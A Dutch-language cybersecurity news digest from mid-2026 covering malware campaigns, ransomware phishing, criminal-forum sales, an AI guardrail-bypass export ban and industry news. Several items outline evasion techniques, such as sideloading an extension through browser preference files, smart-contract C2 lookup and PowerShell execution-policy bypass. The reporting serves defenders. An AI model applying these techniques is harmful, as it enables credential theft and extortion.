Fortinet's rapport bevat domeinen, IP-adressen en bestands-hashes om te blokkeren. Beheerders moeten letten op de 'Financeiro' registry Run key en bestanden die worden gedropt naar C:\SysMain_5874288. Fortinet meldt dat zijn FortiGuard antivirus de samples detecteert en zijn FortiMail product de phishing-e-mail markeert. Hoewel de trojan zelf niet nieuw is en de aangepaste versleuteling jarenlang effectief is gebleven tegen detectie, zijn de nieuwere aspecten de geofencing, een verborgen payload en een dagelijks wisselend adres, allemaal ontworpen om de malware alleen aan daadwerkelijke slachtoffers in de twee landen te tonen.

 

Bron: Fortinet

02 juli 2026 | Kwaadaardige 'Google Notes' browserextensie wisselt cryptowalletadressen

Onderzoekers van McAfee waarschuwen cryptogebruikers wereldwijd voor een kwaadaardige browserextensie die zich voordoet als "Google Notes", maar in werkelijkheid walletadressen wijzigt tijdens transacties. Deze specifieke vorm van malware staat bekend als 'clipper malware' en wordt verspreid via een malafide browserextensie.

Het rapport van McAfee Advanced Threat Research, gepubliceerd op 30 juni 2026 en gedeeld met Hackread.com, beschrijft hoe de campagne gebruikmaakt van niet-ondertekende installatiebestanden om de kwaadaardige extensie in browsers gebaseerd op Chromium te plaatsen, waaronder Google Chrome, Brave en Microsoft Edge.

De extensie presenteert zich als een eenvoudig notitiehulpmiddel, maar het hoofddoel is het monitoren van gekopieerde cryptowalletadressen en deze te vervangen voordat de gebruiker ze in een betaalveld plakt. Hierdoor kan iedereen die crypto verzendt via kopiëren en plakken de adreswissel missen, tenzij het adres nauwkeurig wordt gecontroleerd. Aangezien de meeste cryptotransacties niet kunnen worden teruggedraaid, kan één succesvolle adreswissel leiden tot permanent verlies van de activa.

Achter de façade van een notitie-app vraagt de extensie om toegang die niet overeenkomt met het beweerde doel. McAfee ontdekte verzoeken om toegang tot alle websites, browsegeschiedenis en het klembord, permissies die ongebruikelijk zijn voor een simpele notitie-extensie.

De installatiemethode is eveneens opmerkelijk. Volgens de technische details van McAfee is de malware niet afhankelijk van een normale installatie via de browserstore. Het wijzigt direct de voorkeurbestanden van de browser, waardoor de extensie als vertrouwd kan verschijnen en zonder het gebruikelijke goedkeuringsproces wordt geladen. Hoewel bijgewerkte versies van Chrome en Edge mogelijk nog steeds de ontwikkelaarsmodus vereisen, blijven oudere browsers gebaseerd op Chromium kwetsbaarder, en aanvallers kunnen proberen gebruikers over te halen de ontwikkelaarsmodus in te schakelen.

Eenmaal actief controleert de extensie gekopieerde tekst op walletformaten die zijn gekoppeld aan belangrijke cryptovaluta. McAfee meldde dat Bitcoin, Ethereum, Bitcoin Cash, Ripple en Dash tot de valuta behoorden waarbij fraude met walletadressen werd waargenomen. De onderzoekers ontdekten ook dat de ingediende adressen kunnen worden gekoppeld aan unieke aanvallerswallets, waardoor eenvoudige blokkadelijsten voor wallets minder betrouwbaar zijn.

De operators hebben tevens een methode voor afstandsbediening ingebouwd die voorkomt dat een vaste commandoserver direct in de malware wordt geplaatst. McAfee stelde vast dat de extensie een publiek blockchain smart contract kan opvragen om het actieve backend-domein te achterhalen. Tijdens de analyse werden domeinen zoals devops-offensive(.)cc en Zebregts(.)com geregistreerd.

McAfee-telemetrie toonde een wereldwijde verspreiding van infecties, waarbij India een aanzienlijk hogere concentratie van getroffen gebruikers liet zien dan andere regio's. Het bedrijf concludeerde dat de verspreiding duidt op een opportunistische campagne gericht op consumenten die cryptovaluta gebruiken, en niet op een specifiek op India gerichte operatie.

Als u met cryptovaluta werkt en een browser gebaseerd op Chromium gebruikt, vergelijk dan de eerste en laatste zes tekens van het ontvangende walletadres met de bron, bij voorkeur op een ander apparaat. Dit moet gebeuren vóór het goedkeuren van een cryptotransactie. McAfee adviseert verder om extensies alleen vanuit officiële browserstores te installeren, extensies te verwijderen die de gebruiker zich niet herinnert te hebben geïnstalleerd, permissies te controleren, het downloaden van niet-ondertekende software te vermijden en actieve apparaatbescherming te handhaven.

 

Bron: McAfee

02 juli 2026 | Valse Interpol-e-mails verspreiden ransomware onder kleine bedrijven wereldwijd

Kleine bedrijven wereldwijd worden momenteel geconfronteerd met een geavanceerde phishingcampagne waarbij valse e-mails van Interpol worden gebruikt om ransomware te verspreiden. Deze e-mails, die zich voordoen als officiële onderzoeken van wetshandhavingsfunctionarissen, zetten ontvangers onder druk om bestanden te openen die worden gepresenteerd als bewijs van verdachte bedrijfsactiviteiten. Het openen van deze bestanden leidt echter tot een infectie met malware, resulterend in een ransomware aanval.

Onderzoekers van Bitdefender Antispam Lab hebben deze campagne geïdentificeerd. Zij constateerden dat de e-mails zijn opgesteld in formele taal, urgente onderwerpregels bevatten en gebruikmaken van de branding van wetshandhavingsinstanties om werknemers ervan te overtuigen dat hun organisatie wordt geconfronteerd met een compliance- of beveiligingsonderzoek. De berichten beweren dat onderzoekers informatie en videomateriaal hebben verkregen die verband houden met bedrijfsaccounts, -systemen of -diensten.

De initiële e-mail bevat geen directe malware-bijlage. In plaats daarvan wordt de ontvanger doorgestuurd naar een link naar Proton Drive, met de mededeling dat het bestand een met een wachtwoord beveiligd archief genaamd `archive.rar` betreft. Het wachtwoord is in de e-mail opgenomen, wat de indruk wekt dat het een routineverzoek is en tegelijkertijd helpt om het bestand de basiscontroles van scanners te laten omzeilen.

Zodra het archief is geopend, krijgt het slachtoffer een bestand te zien dat op een videobestand lijkt. Dit is echter geen bewijsmateriaal; Bitdefender stelt dat het een ransomware-payload verbergt binnen meerdere archieflagen, een veelgebruikte truc waarbij een uitvoerbaar bestand wordt vermomd als media. Na uitvoering probeert de malware bestanden op beschikbare schijven te versleutelen en toont het een losgeldbrief. Deze brief informeert het slachtoffer dat bestanden niet kunnen worden hersteld zonder een decryptiesleutel en waarschuwt tegen het verwijderen, verplaatsen of scannen van bestanden. Het slachtoffer wordt geïnstrueerd contact op te nemen met de aanvallers via Tox, een versleuteld instant messaging-protocol.

Opvallend is dat de losgeldbrief geen vast losgeldbedrag vermeldt. De aanvallers lijken te wachten tot slachtoffers contact opnemen en onderhandelen vervolgens op basis van de organisatie en de waarde van de gestolen data. In het rapport van Bitdefender wordt aangegeven dat de malware een op maat gemaakte variant lijkt te zijn en niet behoort tot een bekende ransomware-familie. De code bevat zogenaamde 'hardcoded values', waaronder een wachtwoord dat wordt gebruikt tijdens versleuteling en ontsleuteling, en mist veel functies die kenmerkend zijn voor grote ransomware as a service groepen. De contactmethode via Tox suggereert eveneens dat het hier om een kleinere operatie gaat, gericht op specifieke bedrijven, in plaats van een grootschalige campagne die doorgaans gebruikmaakt van darkweb onderhandelingsportals.

De campagne heeft organisaties bereikt in Europa, Azië, het Midden-Oosten en de Verenigde Staten, met slachtoffers in diverse sectoren zoals voedsel en landbouw, juridische diensten, farmacie, media, technologie en financiën. Kleine bedrijven blijven aantrekkelijke doelwitten, vaak door een gebrek aan fulltime IT- of cybersecuritypersoneel. Een bericht dat afkomstig lijkt van een internationale wetshandhavingsinstantie kan werknemers gemakkelijk aanzetten tot het downloaden en uitvoeren van bestanden zonder de aanvraag te verifiëren, vooral wanneer de e-mail fraude, wangedrag of regelgevingsrisico's suggereert.

Kleine bedrijven met een online aanwezigheid wordt geadviseerd om onverwachte onderzoeksberichten, links voor het delen van bestanden en wachtwoordbeveiligde archieven als hoog risico te behandelen. Werknemers dienen de afzender via een apart kanaal te verifiëren voordat zij bestanden openen via cloudopslaglinks, bestandsextensies zorgvuldig te inspecteren en geen uitvoerbare bestanden te starten die zijn vermomd als documenten, video's of bewijspakketten. Een snelle manier om de kwaadaardigheid van een bestand of URL te controleren zonder het te openen, is door gebruik te maken van VirusTotal.

 

Bron: Bitdefender

02 juli 2026 | VS heft exportverbod op voor AI modellen Mythos en Fable

De Amerikaanse regering heeft het exportverbod voor de AI modellen Mythos en Fable opgeheven, waardoor deze nu weer wereldwijd beschikbaar zijn voor klanten. Dit nieuws is bekendgemaakt door ontwikkelaar Anthropic via zowel X als een blogposting. De AI modellen zijn specifiek ontworpen om kwetsbaarheden in software op te sporen.

Twee weken geleden besloot Anthropic de modellen Fable 5 en Mythos 5 voor alle klanten uit te schakelen, na een bevel van de Amerikaanse overheid. De autoriteiten legden het exportverbod op vanwege zorgen over de nationale veiligheid. Een rapport van Amazon speelde hierbij een cruciale rol; het rapport beschreef een methode om de 'guardrails' van Fable 5 te omzeilen. Hierdoor kon de AI-bot demonstreren hoe een specifiek beveiligingslek te misbruiken was. Het exportverbod hield in dat de AI modellen niet langer mochten worden aangeboden aan andere landen of buitenlandse personen, inclusief niet-Amerikaans personeel van Anthropic zelf. Dit leidde ertoe dat Fable 5 en Mythos 5 wereldwijd werden uitgeschakeld.

Anthropic meldt via X dat het Amerikaanse ministerie van Handel het exportverbod voor Fable 5 en Mythos 5 heeft ingetrokken. Fable 5 zal vanaf 2 juli 2026 weer beschikbaar zijn. Anthropic heeft aangegeven dat dit volgt op een reeks productieve gesprekken met de Amerikaanse regering en dat het model wordt uitgerold met een nieuwe reeks classifiers. Deze classifiers zijn bedoeld om meer cybersecuritytaken te identificeren en te blokkeren. Voor bepaalde taken, zoals programmeren en debugging, zal Fable 5 in de nabije toekomst terugvallen op het model Opus 4.8. Mythos 5 is momenteel beschikbaar voor een select aantal Amerikaanse organisaties, en Anthropic werkt samen met de Amerikaanse regering om de toegang voor meer organisaties, zowel binnen als buiten de VS, te herstellen.

Verder werkt Anthropic samen met Amazon, Microsoft, Google en andere partijen aan een framework. Dit framework is gericht op het bepalen van de ernst van 'AI-jailbreaks' en hoe ontwikkelaars van AI hierop moeten reageren. Tot slot breidt de AI-ontwikkelaar de samenwerking met de Amerikaanse overheid uit op het gebied van tests en waarborgen. De Amerikaanse regering zal toegang krijgen tot nog niet-uitgebrachte AI modellen en bijbehorende waarborgen voor beoordeling. Ook zullen informatie over jailbreaks en misbruik worden gedeeld en middelen beschikbaar worden gesteld voor gezamenlijk onderzoek.

 

Bron: Anthropic

02 juli 2026 | Ransomwaregroep Stormous kondigt einde van eigen operatie aan

De pro-Russische ransomwaregroep Stormous heeft op 1 juli 2026 via zijn eigen lekplatform aangekondigd de activiteiten binnenkort te beëindigen. Volgens de verklaring van de groep zullen alle gehoste gegevens binnen een periode van zestig dagen worden gewist, waarna de website definitief offline zal gaan. 

De mededeling van Stormous sluit aan bij een bekend patroon binnen de cybercrimewereld, waarbij ransomwaregroepen zich terugtrekken en later vaak onder een nieuwe naam opnieuw opduiken. Het is op dit moment niet vast te stellen of Stormous daadwerkelijk stopt met zijn criminele activiteiten, of dat de groep een herstart onder een andere identiteit voorbereidt.

Stormous heeft de afgelopen jaren wereldwijd organisaties getroffen met methoden van dubbele afpersing, waarbij zowel data wordt versleuteld als gestolen data wordt gepubliceerd. De groep heeft in het verleden ook een claim gedaan tegen een Nederlandse religieuze instelling, wat de relevantie voor de Nederlandse doelgroep onderstreept. Voor organisaties die eerder slachtoffer zijn geworden van Stormous, verandert er weinig door deze aankondiging; het risico van openbaarmaking van gestolen gegevens blijft bestaan, zelfs na een vermeende beëindiging van de operatie.

 

Bron: Cybercrimeinfo

02 juli 2026 | Nieuwe Azalea RAT die Defender omzeilt te koop aangeboden op crimineel forum

Op een crimineel forum is een nieuw kwaadaardig hulpmiddel gesignaleerd, genaamd Azalea RAT Rootkit. Een gebruiker biedt deze software aan als een privaat ontwikkeld gereedschap voor afstandsbeheer en aansturing van systemen. Volgens de advertentie beschikt de Azalea RAT over een moderne beheeromgeving en kan deze offline worden geactiveerd.

De verkoper claimt diverse geavanceerde functies, waaronder de mogelijkheid tot diefstal van inloggegevens, het uitschakelen van Windows Defender, functionaliteit van een rootkit, het wissen van forensische logboeken en het omzeilen van detectie door beveiligingssoftware. Deze beweringen zijn op dit moment nog niet onafhankelijk geverifieerd.

De beschikbaarheid van dergelijke kant-en-klare aanvalstools op ondergrondse markten toont aan hoe laagdrempelig geavanceerde cyberaanvallen kunnen worden uitgevoerd, zelfs door minder ervaren criminelen.  Organisaties wordt geadviseerd om hun detectie op basis van gedrag en meerlaagse beveiliging op orde te houden om zich tegen dergelijke dreigingen te wapenen.

 

Bron: Cybercrimeinfo

02 juli 2026 | Aanvaller verkoopt SQL-injectie in webwinkelsoftware OpenCart

Op een crimineel forum is een kwetsbaarheid voor de populaire webwinkelsoftware OpenCart te koop aangeboden. Een gebruiker adverteert een geauthenticeerde SQL-injectie die naar verluidt alle versies vanaf 2.0 tot en met de meest recente versie van OpenCart treft. Om misbruik te maken van het lek is toegang tot het beheerderspaneel van een webshop vereist.

De verkoper claimt dat de kwetsbaarheid via een officiële component van OpenCart toegang verschaft tot de database. Dit zou aanvallers in staat stellen om rechten te verhogen en gevoelige gegevens zoals wachtwoordhashes of resetcodes van beheerders te bemachtigen. De vraagprijs voor deze exploit bedraagt circa vijfhonderd dollar. Volgens de advertentie is er op dit moment nog geen patch beschikbaar om het lek te dichten.

Het aanbod werd via darkweb-monitoring gesignaleerd, al is de claim nog niet onafhankelijk geverifieerd. OpenCart is een veelgebruikt platform voor webwinkels wereldwijd, waaronder een aanzienlijk aantal in Nederland en België. Beheerders van OpenCart webshops worden geadviseerd de toegang tot hun beheerderspaneel streng te beperken en de logboeken nauwlettend te controleren op verdachte databasequery's om potentiële inbraakpogingen te detecteren.

 

Bron: Cybercrimeinfo

02 juli 2026 | Nieuw crimineel forum BreachStars 2.0 gelanceerd als opvolger van eerdere datahandelsites

Op het darkweb is een nieuw crimineel forum met de naam BreachStars 2.0 actief geworden. De beheerders van dit platform presenteren het als de opvolger van diverse eerdere data en hack forums, waarvan een aantal in het verleden door opsporingsdiensten werden ontmanteld of om andere redenen verdwenen.

Het forum is niet alleen bereikbaar via het netwerk van Tor, maar ook via diverse clearnet domeinen, wat de toegankelijkheid vergroot. Dergelijke platforms fungeren als een belangrijke handelsplaats voor een reeks illegale activiteiten, waaronder de verkoop van gestolen gegevens, de handel in toegang tot gehackte systemen en de verspreiding van aanvalsgereedschap.

De lancering van BreachStars 2.0 is via darkweb-monitoring gesignaleerd. Het fenomeen van voortdurend verschijnende nieuwe fora, telkens onder een andere naam nadat een voorganger is opgerold, onderstreept een aanhoudende uitdaging. Voor organisaties benadrukt dit dat buitgemaakte gegevens, zelfs na de takedown van een specifiek forum, blijven circuleren en opnieuw opduiken op nieuwe, vergelijkbare platforms. Dit vereist een continue alertheid en aanpassing van beveiligingsstrategieën.

 

Bron: Cybercrimeinfo

02 juli 2026 | Malwarecampagne VEIL#DROP verspreidt PureLogs infostealer via Google Blogger

Onderzoekers van Securonix hebben een nieuwe, meertraps aanvalsketen blootgelegd die zij de naam VEIL#DROP hebben gegeven. Deze campagne verspreidt de PureLogs infostealer en maakt daarbij misbruik van Google's vertrouwde Blogger en Blogspot platforms als tussenstation. Door gebruik te maken van de legitieme infrastructuur van Google, slagen de aanvallers erin om beveiliging gebaseerd op reputatie te omzeilen.

De initiële infectie vindt doorgaans plaats via gerichte phishing aanvallen of drive-by downloads. Hierbij wordt een JavaScript bestand, dat zich voordoet als een document zoals `transcript.pdf.js`, gebruikt. Dit bestand wordt uitgevoerd via Windows Script Host, waarna het PowerShell activeert met een omzeiling van het uitvoeringsbeleid. Vervolgens haalt het script de volgende fase van de malware op van een Blogger-pagina. Om detectie op basis van URL-patronen te ontwijken, genereert de malware voor elke uitvoering een unieke Blogspot URL met een willekeurig aantal schuine strepen.

De PureLogs malware is ontworpen om volledig in het geheugen te draaien, waardoor het weinig sporen op de schijf achterlaat en detectie wordt bemoeilijkt. Eenmaal actief doorzoekt PureLogs de geïnfecteerde computer intensief op gevoelige informatie. Dit omvat wachtwoorden uit browsers, cookies, automatisch ingevulde gegevens en gegevens van digitale portemonnees. Gestolen sessiecookies kunnen vervolgens door de aanvallers worden hergebruikt om meervoudige authenticatie (MFA) te omzeilen, wat een aanzienlijk risico vormt voor de beveiliging van accounts. Voor organisaties in Nederland en België onderstreept deze campagne het groeiende gevaar van aanvallers die legitieme clouddiensten misbruiken om beveiligingsmaatregelen te ontwijken.

 

Bron: Securonix

02 juli 2026 | Onderzoekers tonen werkende browserransomware ontstaan uit AI-hallucinatie

Onderzoekers van Check Point Research hebben een innovatieve aanvalstechniek gedemonstreerd waarbij een geavanceerd AI model, DeepSeek, een theoretisch concept omzette in functionele ransomware die volledig binnen een webbrowser opereert. Dit onderzoek toont aan hoe AI modellen potentieel nieuwe aanvalspaden kunnen creëren die eerder als onhaalbaar werden beschouwd.

De techniek overbrugt het gat tussen een concept dat men als onmogelijk achtte vanwege de beperkingen van de browsersandbox, en een bestaande browserfunctie. Door gebruik te maken van de File System Access API en toegang te verkrijgen tot mappen met foto's, kan de ransomware bestanden versleutelen zonder dat er kwaadaardige installatiebestanden, app-installaties, browserexploits of beheerderstoegang nodig zijn. De aanval is volledig afhankelijk van social engineering en misleiding, waarbij de gebruiker wordt verleid om een legitieme toestemmingsvraag van de browser te accepteren.

De onderzoekers vonden een concreet voorbeeld van deze methode in een Python-toepassing die op 25 januari 2026 naar VirusTotal was geüpload. Deze toepassing werd door de maker "InfernoGrabber" genoemd. Hoewel er op dit moment geen aanwijzingen zijn dat deze specifieke techniek al in de praktijk wordt misbruikt, roepen de bevindingen wel zorgen op. De studie benadrukt het potentieel van geavanceerde AI modellen om onverwachte en nieuwe aanvalspaden te bedenken, wat een relevante dreiging vormt voor alle internetgebruikers, inclusief die in Nederland en België.

 

Bron: Check Point Research

Algemeen

6.0 Algemeen:

02 juni 2026 | Nederlandse digitale ID-wallet vereist Apple- of Google account

De overheidswallet die de Nederlandse overheid momenteel ontwikkelt voor de Europese digitale identiteit (EDI) vereist een account van Apple of Google. Dit is gemeld door Follow the Money. Hoewel de overheid aangeeft dat er wordt gekeken naar ondersteuning voor gebruikers van andere ecosystemen, zijn de ecosystemen van Apple en Google om veiligheidsredenen als eerste geïmplementeerd.

De Europese Commissie introduceerde in 2021 plannen voor de invoering van een digitale identiteit, waarmee burgers zich binnen de gehele Europese Unie kunnen identificeren. Via een speciale wallet-app voor smartphones en andere apparaten moeten burgers zich kunnen identificeren en elektronische documenten delen. Grote platformen zullen in de toekomst verplicht worden deze nieuwe Europese digitale identiteit te accepteren.

De afgelopen maanden is er onder andere op Hacker News alarm geslagen over het feit dat de wallet-apps die de EU-landen ontwikkelen een Apple- of Google account vereisen. Dit geldt ook voor de NL Wallet, de app waar de Nederlandse overheid aan werkt. Een woordvoerder van staatssecretaris Aerdts voor Digitale Economie verklaarde dat de keuze voor de software van Google en Apple is gemaakt vanwege veiligheidsredenen. Deze platformen bieden ondersteuning en bescherming aan een grote gebruikersgroep en zijn daarom als eerste geïmplementeerd. De autoriteiten hebben tegenover Follow the Money bevestigd dat voor de grootste gebruikersgroepen, die gebruikmaken van deze ecosystemen, op dit moment een veilige oplossing is gerealiseerd. Wel wordt de mogelijkheid onderzocht om gebruikers van andere ecosystemen te ondersteunen, mits deze opties veilig blijken te zijn. De Europese Commissie streeft ernaar dat alle EU-lidstaten voor het einde van dit jaar een werkende wallet-app hebben, een deadline die waarschijnlijk door geen enkel land gehaald zal worden.

De overheid heeft herhaaldelijk benadrukt dat het gebruik van de wallet-app altijd vrijwillig zal zijn en dat deze DigiD niet zal vervangen. Jaap-Henk Hoepman, privacy-expert en universitair hoofddocent digital security aan de Radboud Universiteit in Nijmegen, noemt deze ontkenning "maf". Hij stelt dat het aanbieden van beide apps extra kosten met zich meebrengt voor instanties zoals de Belastingdienst, gemeenten en zorginstellingen. Daarnaast vraagt hij zich af waarom mensen zouden overstappen naar de nieuwe wallet als DigiD beschikbaar blijft.

 

Bron: MinBZK | Bron 2: github.com

02 juni 2026 | Mismanagement lamlegt cruciale NIST National Vulnerability Database

Een cruciaal databank voor kwetsbaarheden in cybersecurity, beheerd door het Amerikaanse National Institute of Standards and Technology (NIST), is ernstig verzwakt door wanbeheer en strategische tekortkomingen. Dit heeft geleid tot een extreme achterstand in de verwerking van kwetsbaarheden, zo blijkt uit een recent intern rapport van de inspecteur-generaal van het Department of Commerce. De National Vulnerability Database (NVD) van NIST, een essentieel hulpmiddel voor zowel de industrie als overheidsinstanties om kwetsbaarheden in cybersecurity te prioriteren, zag de achterstand oplopen van 13.000 onverwerkte kwetsbaarheden in februari 2024 tot meer dan 27.000 eind 2025. Dit ondermijnt de bruikbaarheid van de NVD en het publieke vertrouwen, aldus het rapport.

De verslechterende achterstand ontstond in februari 2024, toen NIST stopte met het betalen van de contractanten die de beveiligingslekken verwerken. Slechte planning door NIST leidde tot de huidige situatie. NIST had beloofd het probleem tegen september 2024 op te lossen, maar slaagde er niet in het doel van ongeveer 6.200 verwerkte kwetsbaarheden per maand te halen. Historisch verwerkte het agentschap nooit meer dan 5.000 kwetsbaarheden per maand en erkende het geen plan te hebben om het gestelde doel te bereiken.

Het rapport stelt dat NIST geen duurzame processen heeft om inzendingen voor de NVD te beheren en de achterstand niet kan wegwerken zonder significante veranderingen. Naast zwakke strategische planning, verzuimde NIST te communiceren met het Cybersecurity and Infrastructure Security Agency (CISA). Dit leidde tot dubbel werk in minstens 21.000 gevallen tussen mei 2024 en december 2025. CISA lanceerde in mei 2024 zijn eigen Vulnrichment-programma, maar NIST coördineerde niet met CISA nadat het programma van de NVD zijn contractanten opnieuw had ingehuurd. De twee instanties huurden zelfs dezelfde contractant in voor identiek werk, wat resulteerde in ongeveer 200.000 dollar verspilling sinds mei 2024. Dit gebrek aan communicatie heeft stakeholders gefrustreerd en het vertrouwen in de NVD verminderd.

De inspecteur-generaal beveelt aan dat NIST efficiënter wordt bij het toekennen van ernstscores en het labelen van getroffen producten. NIST kan de komende twee jaar ongeveer 800.000 dollar besparen door minder tijd te besteden aan het scoren. Tachtig procent van de inzendingen bevat al ernstscores, en de scores van NIST komen slechts in 12 procent van de gevallen overeen met die van onafhankelijke beoordelaars. Verder heeft het agentschap nagelaten effectief te communiceren met stakeholders, wat bleek uit een open brief van 50 cybersecurityprofessionals in april 2024, waarop geen reactie kwam. De brief onderstreepte de "gebrek aan transparante communicatie" over de "terugval in de operaties van de NVD".

NIST moet een plan opstellen om de NVD te herstellen, efficiënter communiceren, minder tijd besteden aan ernstscores en samenwerken met CISA om dubbel werk te voorkomen. Het agentschap heeft ingestemd met de aanbevelingen en zal onmiddellijk beginnen met verbeteringen, zo blijkt uit een brief van april van waarnemend directeur van NIST, Craig Burkhardt. Michael Daniel, president en CEO van de Cyber Threat Alliance, suggereert zelfs dat NIST de verantwoordelijkheid voor de NVD aan CISA zou moeten overdragen, gezien de "significante middelen tekorten" bij NIST en omdat het runnen van een dergelijk operationeel programma beter past bij de missie van CISA.

 

Bron: Office of Inspector General, Department of Commerce | Bron 2: oig.doc.gov | Bron 3: cyberscoop.com

02 juni 2026 | Microsoft wijzigt standpunt over publicatie zero-days na kritiek

Microsoft heeft maandag aangegeven "geen intentie te hebben om actie te ondernemen" tegen beveiligingsonderzoekers die kwetsbaarheden ontdekken en hun bevindingen publiceren. Deze verklaring volgt op een eerdere officiële blogpost die dagen daarvoor een golf van kritiek teweegbracht binnen de beveiligingsgemeenschap. De oorspronkelijke post had een recente reeks ongecoördineerde publicaties van Windows zero-days veroordeeld als "nooit gerechtvaardigd" en stelde dat de Digital Crimes Unit van het bedrijf "zaken zou blijven aanspannen tegen" degenen die criminele actoren in staat stellen schade te berokkenen.

Hoewel Microsoft de pseudonieme onderzoeker Nightmare Eclipse, verantwoordelijk voor de onthullingen, niet expliciet bij naam noemde of direct bedreigde, werden de publicaties wel omschreven als het creëren van "onnodig risico". De woordkeuze van Microsoft werd door velen opgevat als een dreigement. Dit leidde tot kritiek vanuit de beveiligingsgemeenschap, waarbij veel onderzoekers sympathie toonden voor de grieven van Nightmare Eclipse tegen Microsoft. De onderzoeker beweerde onder meer dat het bedrijf hun Microsoft Security Response Center account had verwijderd, bounty-betalingen had achtergehouden en hun attributie had verwijderd uit ten minste één advies.

In de nieuwe verklaring, die via sociale media werd gedeeld in plaats van via de officiële blog, gaf Microsoft aan de feedback serieus te nemen. Het bedrijf verduidelijkte: "Om duidelijk te zijn over onze benadering van juridische zaken, hebben we geen intentie om actie te ondernemen tegen individuen die beveiligingsonderzoek uitvoeren of publiceren." Hieraan werd de kanttekening toegevoegd: "Wanneer een individu de wet overtreedt en zich bezighoudt met kwaadaardige activiteiten die reële schade toebrengen aan onze klanten, zullen we waar nodig samenwerken met wetshandhaving."

Microsoft erkende tekortkomingen in de omgang met relaties met onderzoekers, door te stellen dat "sommige interacties tekort zijn geschoten" en dat het bedrijf "leert" van deze incidenten. De verklaring ging niet direct in op de specifieke aantijgingen van Nightmare Eclipse. Ook liet de nieuwe verklaring de term "responsible disclosure" vallen, die vier keer voorkwam in de oorspronkelijke post. Microsoft verwijst nu in plaats daarvan naar "Coordinated Vulnerability Disclosure", een term die het bedrijf in 2010 adopteerde om de implicatie te vermijden dat onderzoekers die niet voldoen aan de regels zich onverantwoordelijk gedragen. Katie Moussouris, die als Microsoft-medewerker hielp om de eerdere term buiten gebruik te stellen, had het opnieuw verschijnen ervan in de eerdere post als "beladen" bestempeld.

Microsoft benadrukte verder: "De beveiligingsgemeenschap speelt een vitale rol in het helpen beschermen van klanten. We zijn toegewijd aan het onderhouden van een constructieve en respectvolle relatie en om samen te groeien. We weten dat er, gezien de aard van dit werk, soms misverstanden zullen ontstaan. We blijven toegewijd aan te goeder trouw te handelen en een respectvolle en professionele ervaring te bieden aan alle onderzoekers, ongeacht eerdere interacties."

In een blogpost gaf Nightmare Eclipse aan dat na "recente gebeurtenissen" andere onderzoekers hen hadden benaderd en in sommige gevallen kwetsbaarheden direct hadden aangeleverd. De onderzoeker kondigde aan dat een nieuwe Secure kwetsbaarheid in Boot ergens in juni zal worden gepubliceerd. Deze bug "omzeilt BitLocker volledig" en kan mogelijk worden gebruikt om vertrouwelijke virtuele machines te compromitteren. Een woordvoerder van Microsoft verklaarde na de publicatie dat het bedrijf geen MSRC-onderzoekersportaalaccounts verwijdert en kon niet bevestigen welk account de persoon claimt dat is gedeactiveerd.

 

Bron: Microsoft | Bron 2: recordedfuture.com

02 juni 2026 | Have I Been Pwned registreert duizendste datalek en uit kritiek op bedrijven

De website Have I Been Pwned (HIBP), opgericht door Troy Hunt, heeft een belangrijke mijlpaal bereikt door het duizendste datalek te registreren. Sinds de lancering eind 2013 is de website uitgegroeid tot een essentiële bron voor internetgebruikers die willen controleren of hun e-mailadres is betrokken bij een van de vele datalekken die wereldwijd plaatsvinden. De databases van HIBP bevatten inmiddels gegevens van 17,5 miljard gecompromitteerde accounts, afkomstig van duizend verschillende gehackte websites.

Onder de grootste datalekken die HIBP heeft vastgesteld, bevinden zich incidenten bij Facebook, MySpace, Wattpad, NetEase, Deezer en Twitter. Bij elk van deze diensten werden gegevens van meer dan tweehonderd miljoen accounts buitgemaakt, met Facebook als uitschieter met bijna 510 miljoen gestolen accounts. Het duizendste geregistreerde datalek betreft het "car-shopping platform" Edmunds, waarbij de criminele groepering ShinyHunters verantwoordelijk was voor het stelen van gegevens van 178.000 personen.

Oprichter Troy Hunt uit echter ook zijn zorgen over een groeiende trend: bedrijven nemen steeds langer de tijd om slachtoffers van datalekken te informeren. Bedrijven rechtvaardigen dit vaak door aan te geven dat ze eerst de aard en omvang van de gestolen data grondig willen vaststellen. Hunt bekritiseert deze houding, omdat het impliceert dat een vroege waarschuwing niet kan worden verstuurd voordat de volledige impact duidelijk is, iets wat volgens hem relatief eenvoudig te realiseren zou moeten zijn voor een organisatie.

Hunt vermoedt dat bedrijven het uitstellen van de bekendmaking van een datalek bewust doen om class action rechtszaken te voorkomen. Hij benadrukt dat deze aanpak niet primair gericht is op het beschermen van de klant, maar eerder op het afschermen van de organisatie zelf, gezien de verantwoordelijkheid van bedrijven jegens hun aandeelhouders.

 

Bron: Have I Been Pwned | Bron 2: troyhunt.com

02 juni 2026 | Detectie van cyberaanvallen even cruciaal als preventie, pentesten bieden inzicht

De uitspraak van voormalig FBI Director Robert Mueller, dat er twee soorten bedrijven zijn – zij die gehackt zijn en zij die nog gehackt zullen worden – blijft onverminderd relevant. Toch onderschatten veel organisaties hun kwetsbaarheid. Pentesten bieden een effectieve methode om zwakke plekken snel te identificeren.

Recentelijk demonstreerde het televisieprogramma ‘Hacked’ dit, waarin ethische hackers bij diverse Belgische bedrijven binnendrongen. Keanu Nys, ethische hacker bij Spotit, was een van deze experts. Hij merkt op dat het programma IT managers en bedrijfsleiders heeft wakker geschud en het nut van ethisch hacken steeds meer wordt ingezien.

Een opvallend voorbeeld uit het programma was de succesvolle poging om het netwerk van Stad Herentals binnen te dringen via een onbeveiligde printer. Nys legt uit dat netwerkprinters vaker als zwak punt naar voren komen. Deze printers, geconfigureerd voor taken zoals het opslaan van bestanden of het versturen van e-mails, vereisen opgeslagen credentials. Deze zijn relatief eenvoudig op te halen en beschikken soms over te veel rechten, wat een aanzienlijk risico vormt.

Veel bedrijven geloven voorbereid te zijn, maar de realiteit kan anders zijn. De 2025 Cisco Cybersecurity Readiness Index toont aan dat slechts vier procent van de organisaties volledig is voorbereid op moderne cyberaanvallen, terwijl 34 procent dit wel denkt te zijn. Dit betekent dat slechts ongeveer één op de tien organisaties die zichzelf als weerbaar beschouwen, dit ook daadwerkelijk is.

Nys deelt cruciale tips om de cybersecurity te versterken. Multifactorauthenticatie (MFA) zou een standaardreflex moeten zijn, maar wordt nog steeds vaak niet volledig toegepast, of er zijn uitzonderingen. Dit biedt aanvallers een eenvoudige ingang. Daarnaast zijn password managers essentieel voor het veilig genereren en beheren van unieke wachtwoorden. Het belang van phishing awareness en trainingen voor werknemers blijft eveneens groot, aangezien phishing een belangrijke aanvalsfactor is die ethische hackers regelmatig misbruiken. Hoewel tools een groot deel van phishingaanvallen kunnen detecteren, is awareness training onmisbaar voor de aanvallen die toch de verdediging passeren.

